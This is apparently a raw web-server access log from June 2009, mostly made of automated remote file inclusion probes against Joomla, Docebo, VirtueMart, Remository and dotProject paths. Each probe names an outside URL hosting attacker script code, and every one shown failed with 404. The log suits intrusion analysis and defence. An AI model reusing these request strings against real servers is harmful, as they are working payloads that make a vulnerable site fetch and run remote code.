83.98.209.71 - - [21/Jun/2009:00:58:55 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:59:03 -0400] "GET //index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:59:03 -0400] "GET /logs//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:59:03 -0400] "GET /logs/access_log.Q109061400//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:59:18 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:59:24 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:59:24 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:59:25 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:59:28 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:59:30 -0400] "GET /logs/access_log.Q109061200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:59:30 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:59:30 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:00:59:30 -0400] "GET /logs/access_log.Q109060800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:59:35 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:59:35 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:59:36 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:59:50 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:59:51 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:59:51 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:00:59:52 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:00:59:52 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:00:59:57 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:00:06 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:00:07 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:08 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:09 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:00:09 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:00:10 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:00:10 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:12 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:14 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:15 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:15 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:20 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:23 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:00:27 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:00:27 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:28 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:28 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:28 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:29 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:35 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:37 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:38 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:44 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:00:46 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:00:46 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:48 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:01:00:49 -0400] "GET /images/over-index5_nedlhol.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
83.98.209.71 - - [21/Jun/2009:01:00:51 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:00:52 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:00:53 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:00:55 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:00:58 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:01:01 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:01:01 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:01:02 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:01:03 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:01:18 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:01:18 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:01:23 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:01:23 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:01:35 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:01:01:37 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
68.4.208.45 - - [21/Jun/2009:01:02:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
68.4.208.45 - - [21/Jun/2009:01:02:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
83.16.182.130 - - [21/Jun/2009:01:02:57 -0400] "GET //index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:02:57 -0400] "GET /logs//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:02:57 -0400] "GET /logs/access_log.Q109061400//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:03:04 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:03:07 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:03:08 -0400] "GET /index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:03:08 -0400] "GET /logs/access_log.Q109051500/index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:03:10 -0400] "GET /logs/index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:03:36 -0400] "GET /logs/access_log.Q109061400%20%20//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:04:22 -0400] "GET /logs/access_log.Q109052800%20%20//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:04:55 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:05:28 -0400] "GET /logs/access_log.Q109051900/index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:01:05:29 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC44284D292009DBF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.232.54.48 - - [21/Jun/2009:01:05:42 -0400] "GET /logs/access_log.Q109052000//dotproject/modules/files/index_table.php?root_dir=http://kudacuki.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
201.232.54.48 - - [21/Jun/2009:01:05:42 -0400] "GET /logs//dotproject/modules/files/index_table.php?root_dir=http://kudacuki.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
201.232.54.48 - - [21/Jun/2009:01:05:42 -0400] "GET //dotproject/modules/files/index_table.php?root_dir=http://kudacuki.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
201.232.54.48 - - [21/Jun/2009:01:05:46 -0400] "GET /logs/access_log.Q109052000//dotproject/modules/files/index_table.php?root_dir=http://kudacuki.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
201.232.54.48 - - [21/Jun/2009:01:05:48 -0400] "GET //dotproject/modules/files/index_table.php?root_dir=http://kudacuki.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
201.232.54.48 - - [21/Jun/2009:01:05:48 -0400] "GET /logs//dotproject/modules/files/index_table.php?root_dir=http://kudacuki.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
83.98.209.71 - - [21/Jun/2009:01:05:53 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:06:05 -0400] "GET /logs/access_log.Q109051500/index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:06:05 -0400] "GET /index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:06:10 -0400] "GET /logs/index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:06:13 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:06:17 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:01:06:41 -0400] "GET /logs/access_log.Q109052000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.826"
83.16.182.130 - - [21/Jun/2009:01:07:01 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:07:01 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:07:01 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:07:02 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:01:07:07 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:01:08:25 -0400] "GET /logs/access_log.Q109051900/index.php?option=com_content&task=view&id=4&Itemid=7%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://orlando.micfo.com/~clandios/modules/My_eGallery/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:01:10:35 -0400] "GET /images/over-images8_kendall.jpg HTTP/1.1" 200 2315 "-" "Googlebot-Image/1.0"
83.16.182.130 - - [21/Jun/2009:01:10:40 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:10:42 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:01:10:44 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L4047DF4A0150040057EB04G+WSEQ(S0060):1+OUITEM(A0200):5099250 HTTP/1.1" 200 27022 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.216.86 - - [21/Jun/2009:01:12:51 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:01:12:51 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:01:12:51 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:01:13:08 -0400] "GET /logs/access_log.Q109052900/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:13:44 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:01:13:46 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
